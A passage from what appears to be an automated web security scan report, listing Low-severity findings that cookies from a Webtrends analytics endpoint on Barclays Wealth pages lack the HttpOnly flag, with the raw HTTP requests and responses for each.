Date: Mon, 03 Oct 2011 00:02:10 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=245968D340BB5968593028CAA74B029E; Path=/ots
Set-Cookie: _wt.mode-79569=fcdcc722e932033a5f6d; Path=/
Set-Cookie: _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a05651019; Expires=Sun, 01-Jan-2012 00:02:11 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
14.32. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e5634a7f054ba3498f73914ebeb4a7b43817e4a18fdd93098342a6389f2866e08f3e2e75638d737d198594ecd0cb755bca9cf478e40640a4400dacda9d56d8e247c53b46449047ebc45b62d489ac921adcd1b2097f4226a4de10944e8169319c042664cece1cf1de9bc4844c947cbb2366e05715c017443ba29ce8751730be12d1255f915ab3b50ca55b9ce8187d9ecf1da2246ca847d1bf13bf5dc051b6546dbf2d4dad7e8c1acc3530e9f11df75ceb12cc34353b784491f7c1e2cf3d6cc6e3bc92db9afadca8b91f3645e7d7cac0890b131adf1666129b04db5b02237cdf5fc14fb6a2a5e043dc564b12bd3a620b252d8d3613373433f6b9797f933b28413e12012614aff95f89c5f2a321a556699232da5557002622ffeeaf331e5a1517ef7dd8ebcbf314c51f4d9ac13351a216800c1db0659fa269bbc251edd7f5315d5879ad3e01d0bd06  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e5634a7f054ba3498f73914ebeb4a7b43817e4a18fdd93098342a6389f2866e08f3e2e75638d737d198594ecd0cb755bca9cf478e40640a4400dacda9d56d8e247c53b46449047ebc45b62d489ac921adcd1b2097f4226a4de10944e8169319c042664cece1cf1de9bc4844c947cbb2366e05715c017443ba29ce8751730be12d1255f915ab3b50ca55b9ce8187d9ecf1da2246ca847d1bf13bf5dc051b6546dbf2d4dad7e8c1acc3530e9f11df75ceb12cc34353b784491f7c1e2cf3d6cc6e3bc92db9afadca8b91f3645e7d7cac0890b131adf1666129b04db5b02237cdf5fc14fb6a2a5e043dc564b12bd3a620b252d8d3613373433f6b9797f933b28413e12012614aff95f89c5f2a321a556699232da5557002622ffeeaf331e5a1517ef7dd8ebcbf314c51f4d9ac13351a216800c1db0659fa269bbc251edd7f5315d5879ad3e01d0bd06

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e5634a7f054ba3498f73914ebeb4a7b43817e4a18fdd93098342a6389f2866e08f3e2e75638d737d198594ecd0cb755bca9cf478e40640a4400dacda9d56d8e247c53b46449047ebc45b62d489ac921adcd1b2097f4226a4de10944e8169319c042664cece1cf1de9bc4844c947cbb2366e05715c017443ba29ce8751730be12d1255f915ab3b50ca55b9ce8187d9ecf1da2246ca847d1bf13bf5dc051b6546dbf2d4dad7e8c1acc3530e9f11df75ceb12cc34353b784491f7c1e2cf3d6cc6e3bc92db9afadca8b91f3645e7d7cac0890b131adf1666129b04db5b02237cdf5fc14fb6a2a5e043dc564b12bd3a620b252d8d3613373433f6b9797f933b28413e12012614aff95f89c5f2a321a556699232da5557002622ffeeaf331e5a1517ef7dd8ebcbf314c51f4d9ac13351a216800c1db0659fa269bbc251edd7f5315d5879ad3e01d0bd06 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/about-us.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=2D0CE6DA7B82936A31CBC9ACE233AAA7; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c73ae63744334ae8cef4967d1912276c4668924ff5e00a6078cb239e3f1b573242cbd9b707a451092fc680a56b548caeb5a3f96f49b427787e772f8662a4191929dc9447c4758dd37c9d02690b0b; _wt.mode-79569=fcdcc722e93200beff43; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a00d8b959

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:06 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=699E9E21874BEC698EE100FEE3749834; Path=/ots
Set-Cookie: _wt.mode-79569=fcdcc722e932047ca940; Path=/
Set-Cookie: _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a025a8920; Expires=Sun, 01-Jan-2012 00:02:06 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
14.33. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e56b4664154de05d88349654b2faf5f17400eebc8ad58213ce16bc76e20e58ddb0521b5346b74a4c0b939fab858b3845c5caa275bc4214e60652fa9aa826b79c23b45e6234f1698d945b37d393f4800dc3a2a9476e2d5ed2d305ea49962b64c3436639f0bf7addb8f9b9e12c8519ea7235d21c5abd3d7908bbb3cb7f0a2af95a84640afa25d7ce67c628fb921a16d88849f87d3fc71f87e7419344c94c9c1323fe7456a364ce5d8d6724f1fd739c1cac4a83263f2979488ce483ba917a1990a0ecd4c893e99feff5432c51f3a68c87965f494d925c31489802d15f032f689206a648a9d2f7bc0dfa475111832c2541355de16a1f3c2678feb3792b9330741c6017413d02c6951bccc9a8b82de25772df23e13f44417b6eede2ee36065d431eea7dd3b7cba811de4f509edd201df746c4470dae7efd9506c5a523fe8eef3b5a4362e076fcf94d7c3b0474c9933a1b478b3ecbf1f03da2c7f2ab59dc60a3145422052fdbcd470b595d50e9e319190f85e380470d46bbe2e34f825cb0104cd4c0be9de734592e19b94bc22f0b7b34a958b37a9b82f9c8006566f05e9b1fdbd5efb8c0706b546f5df1cc09994c53f2fddb5cbdcfad20dd8caeda6a0a4ac96042564e322c0327bb23e135a765e65c523e35de2ade710f970e16d92f714c3ee1053f915e48588cd29a5af840cdf54cf4b683f7a12656af63a3d9f82b84283f5dd7ae121b8672173481535773dfe64beff9fba901c207770e811752977a9fdea3c2edd93705d9ae0b159bd52ac2ab088e34cee34d2867335ae73ec5b1f58329b27d63394c19348f4c051a0496dcceb42c2033cada7f18ce724eefde8062313b83757f5babedd5c5f14625c7812596dbd375692a55d3ba0de51fcb6782c458b2bd098141e8ee93f98552ab24ffd09783844bfcdf15ad2cfd41cd8a6a6ce410e38848d815fa6da7e345e4b46612ddbf7614bf714fcaa8d77bf303d453ed252d68b9b40fdc2c4715a768c049eae0878fcdfe0593004576ef3020a76c9eb01955607d2ddf183796f9a11232a0449899e98d449b371fa7a188cad976fad6267b3b4ad8df3963d05af9355e2323627f650a5b0315763e3e50cb1bf4f9d20d770827621faf142f690d6b91fe55225cc1f9ea56879a729cd74ba8a4ba5648d17d7d1af5032e00a0095a93d6bd7364c4cbf5bda0ddbf14f07d45d8f335d1af007900a7ba1bfee0ff8b186837a2a5cd569c5605b9249e02cf94a7  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e56b4664154de05d88349654b2faf5f17400eebc8ad58213ce16bc76e20e58ddb0521b5346b74a4c0b939fab858b3845c5caa275bc4214e60652fa9aa826b79c23b45e6234f1698d945b37d393f4800dc3a2a9476e2d5ed2d305ea49962b64c3436639f0bf7addb8f9b9e12c8519ea7235d21c5abd3d7908bbb3cb7f0a2af95a84640afa25d7ce67c628fb921a16d88849f87d3fc71f87e7419344c94c9c1323fe7456a364ce5d8d6724f1fd739c1cac4a83263f2979488ce483ba917a1990a0ecd4c893e99feff5432c51f3a68c87965f494d925c31489802d15f032f689206a648a9d2f7bc0dfa475111832c2541355de16a1f3c2678feb3792b9330741c6017413d02c6951bccc9a8b82de25772df23e13f44417b6eede2ee36065d431eea7dd3b7cba811de4f509edd201df746c4470dae7efd9506c5a523fe8eef3b5a4362e076fcf94d7c3b0474c9933a1b478b3ecbf1f03da2c7f2ab59dc60a3145422052fdbcd470b595d50e9e319190f85e380470d46bbe2e34f825cb0104cd4c0be9de734592e19b94bc22f0b7b34a958b37a9b82f9c8006566f05e9b1fdbd5efb8c0706b546f5df1cc09994c53f2fddb5cbdcfad20dd8caeda6a0a4ac96042564e322c0327bb23e135a765e65c523e35de2ade710f970e16d92f714c3ee1053f915e48588cd29a5af840cdf54cf4b683f7a12656af63a3d9f82b84283f5dd7ae121b8672173481535773dfe64beff9fba901c207770e811752977a9fdea3c2edd93705d9ae0b159bd52ac2ab088e34cee34d2867335ae73ec5b1f58329b27d63394c19348f4c051a0496dcceb42c2033cada7f18ce724eefde8062313b83757f5babedd5c5f14625c7812596dbd375692a55d3ba0de51fcb6782c458b2bd098141e8ee93f98552ab24ffd09783844bfcdf15ad2cfd41cd8a6a6ce410e38848d815fa6da7e345e4b46612ddbf7614bf714fcaa8d77bf303d453ed252d68b9b40fdc2c4715a768c049eae0878fcdfe0593004576ef3020a76c9eb01955607d2ddf183796f9a11232a0449899e98d449b371fa7a188cad976fad6267b3b4ad8df3963d05af9355e2323627f650a5b0315763e3e50cb1bf4f9d20d770827621faf142f690d6b91fe55225cc1f9ea56879a729cd74ba8a4ba5648d17d7d1af5032e00a0095a93d6bd7364c4cbf5bda0ddbf14f07d45d8f335d1af007900a7ba1bfee0ff8b186837a2a5cd569c5605b9249e02cf94a7

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e56b4664154de05d88349654b2faf5f17400eebc8ad58213ce16bc76e20e58ddb0521b5346b74a4c0b939fab858b3845c5caa275bc4214e60652fa9aa826b79c23b45e6234f1698d945b37d393f4800dc3a2a9476e2d5ed2d305ea49962b64c3436639f0bf7addb8f9b9e12c8519ea7235d21c5abd3d7908bbb3cb7f0a2af95a84640afa25d7ce67c628fb921a16d88849f87d3fc71f87e7419344c94c9c1323fe7456a364ce5d8d6724f1fd739c1cac4a83263f2979488ce483ba917a1990a0ecd4c893e99feff5432c51f3a68c87965f494d925c31489802d15f032f689206a648a9d2f7bc0dfa475111832c2541355de16a1f3c2678feb3792b9330741c6017413d02c6951bccc9a8b82de25772df23e13f44417b6eede2ee36065d431eea7dd3b7cba811de4f509edd201df746c4470dae7efd9506c5a523fe8eef3b5a4362e076fcf94d7c3b0474c9933a1b478b3ecbf1f03da2c7f2ab59dc60a3145422052fdbcd470b595d50e9e319190f85e380470d46bbe2e34f825cb0104cd4c0be9de734592e19b94bc22f0b7b34a958b37a9b82f9c8006566f05e9b1fdbd5efb8c0706b546f5df1cc09994c53f2fddb5cbdcfad20dd8caeda6a0a4ac96042564e322c0327bb23e135a765e65c523e35de2ade710f970e16d92f714c3ee1053f915e48588cd29a5af840cdf54cf4b683f7a12656af63a3d9f82b84283f5dd7ae121b8672173481535773dfe64beff9fba901c207770e811752977a9fdea3c2edd93705d9ae0b159bd52ac2ab088e34cee34d2867335ae73ec5b1f58329b27d63394c19348f4c051a0496dcceb42c2033cada7f18ce724eefde8062313b83757f5babedd5c5f14625c7812596dbd375692a55d3ba0de51fcb6782c458b2bd098141e8ee93f98552ab24ffd09783844bfcdf15ad2cfd41cd8a6a6ce410e38848d815fa6da7e345e4b46612ddbf7614bf714fcaa8d77bf303d453ed252d68b9b40fdc2c4715a768c049eae0878fcdfe0593004576ef3020a76c9eb01955607d2ddf183796f9a11232a0449899e98d449b371fa7a188cad976fad6267b3b4ad8df3963d05af9355e2323627f650a5b0315763e3e50cb1bf4f9d20d770827621faf142f690d6b91fe55225cc1f9ea56879a729cd74ba8a4ba5648d17d7d1af5032e00a0095a93d6bd7364c4cbf5bda0ddbf14f07d45d8f335d1af007900a7ba1bfee0ff8b186837a2a5cd569c5605b9249e02cf94a7 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/international-bank-account.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=366C424481F456C6E4820AE57695F69C; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a05651019; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d01953baa; _wt.mode-79569=fcdcc722e93200feed40

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:12 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=46EC8A693A8B058A0B9D418F6DDAF0B4; Path=/ots
Set-Cookie: _wt.mode-79569=fcdcc722e93201eda062; Path=/
Set-Cookie: _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc200599559; Expires=Sun, 01-Jan-2012 00:02:13 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
14.34. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e56b4664154de05d88349654b2faf5fa7b06e8a285cd8557c816bb73a1054dd6f61c085541b14b0f1cdc85bbc6c13104c5d4e138b4441efe4d0df29ac219ca9f33aa597333f06094a72f0b8693f583078ca7a20868390dd09a51f64f9632368b476625a1b97fdeb7fbe3ee2e9f15fc753db61b44d95d1c6d908adf73080ff95a857114d212e9df7fc023f7926c1affcf77ff603dec1e90cc59b840d67c805e76b06755b56dc15c816627f1e4749c07ae4b98253a37795a90f6d2ffd57b3693a6c9d99ecaa3c9a7a2527c08b4dbd7d1ef687965b66d7c1e975c8c4819341ab9128d14f9b1bdee50ad380f57e1607502342b902a0c35352af2b371709e343f483515143f0fc99e12cb86a0b22ab052728728bd3c0c456974ff8bd27744064404e26ad0fccbe513db005298de7110f64ccb4609be6beaa96988e67faccfed7a085828f21c9bea0b2773172bd891771d4d836ccdfffa31f995b8fc42887cb3575827453bccd907351c104cefba115a4bd9ee95130217e8bdfa0cd23ab3116e9c89e3d09b38184a5fe50c93587e762fa74be77fcad2faca5a3666a5599e4a86d7e4ecc7733b506d0fa6cc09cf1a56faa0dc59bfccaa26dd86f48b704209a9012b257d48680e37e775f52dbd038c4b143731ce21cd7914c25b15db25224b3bee5373935f185a89d99254f340d0f11ef6b280f8fa7d57a97bf7dff879d0253f5789af0b4e906e0259ea13157c8af715fefae0a517c4043d0ed61354c4279387ad91fbc67362e5ee491d9b9428d5ab48c026f3da596a3f7140ea7890f9f1807be6793e6641163ac21e4d1318d29893e16c3721d3cb0243980354f494882062679b747f4ca7f6919cb7407796802197808477612c0082bf53eb1a8d28c4b903e4cc0b860aefb0c1b29d53ab33f3cbd0809f1cac8b43fb29fd469fdc6b6ab046e78448d743a93ea6e917e4e43311dabd2011e0744e9affd57dfa06865fb7252769bab308d9291514a338c41bbfe2d3d9c5fe539f021722ba6875a46b9ae61b01352b7bd8133bc0aef41132a2109c99b6de15c83543f0a38fc8db26aad571263c1ddcd13d64d45ea865522576347b3f0d0d044a746f350acb15f7ff8856755a7c3212ab422a680e6ec1ae07755dccf9ed00d5cb749d874ca9a0bd514f81777a17f65d705af40a5d948ae67c37c6c3f9e9a1d8be17ac7c4e82a33f87f30d2454a9bb4bfdb2fbd7483e61a6a0cc5f955742fc6ec1cb515d04b739fb  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e56b4664154de05d88349654b2faf5fa7b06e8a285cd8557c816bb73a1054dd6f61c085541b14b0f1cdc85bbc6c13104c5d4e138b4441efe4d0df29ac219ca9f33aa597333f06094a72f0b8693f583078ca7a20868390dd09a51f64f9632368b476625a1b97fdeb7fbe3ee2e9f15fc753db61b44d95d1c6d908adf73080ff95a857114d212e9df7fc023f7926c1affcf77ff603dec1e90cc59b840d67c805e76b06755b56dc15c816627f1e4749c07ae4b98253a37795a90f6d2ffd57b3693a6c9d99ecaa3c9a7a2527c08b4dbd7d1ef687965b66d7c1e975c8c4819341ab9128d14f9b1bdee50ad380f57e1607502342b902a0c35352af2b371709e343f483515143f0fc99e12cb86a0b22ab052728728bd3c0c456974ff8bd27744064404e26ad0fccbe513db005298de7110f64ccb4609be6beaa96988e67faccfed7a085828f21c9bea0b2773172bd891771d4d836ccdfffa31f995b8fc42887cb3575827453bccd907351c104cefba115a4bd9ee95130217e8bdfa0cd23ab3116e9c89e3d09b38184a5fe50c93587e762fa74be77fcad2faca5a3666a5599e4a86d7e4ecc7733b506d0fa6cc09cf1a56faa0dc59bfccaa26dd86f48b704209a9012b257d48680e37e775f52dbd038c4b143731ce21cd7914c25b15db25224b3bee5373935f185a89d99254f340d0f11ef6b280f8fa7d57a97bf7dff879d0253f5789af0b4e906e0259ea13157c8af715fefae0a517c4043d0ed61354c4279387ad91fbc67362e5ee491d9b9428d5ab48c026f3da596a3f7140ea7890f9f1807be6793e6641163ac21e4d1318d29893e16c3721d3cb0243980354f494882062679b747f4ca7f6919cb7407796802197808477612c0082bf53eb1a8d28c4b903e4cc0b860aefb0c1b29d53ab33f3cbd0809f1cac8b43fb29fd469fdc6b6ab046e78448d743a93ea6e917e4e43311dabd2011e0744e9affd57dfa06865fb7252769bab308d9291514a338c41bbfe2d3d9c5fe539f021722ba6875a46b9ae61b01352b7bd8133bc0aef41132a2109c99b6de15c83543f0a38fc8db26aad571263c1ddcd13d64d45ea865522576347b3f0d0d044a746f350acb15f7ff8856755a7c3212ab422a680e6ec1ae07755dccf9ed00d5cb749d874ca9a0bd514f81777a17f65d705af40a5d948ae67c37c6c3f9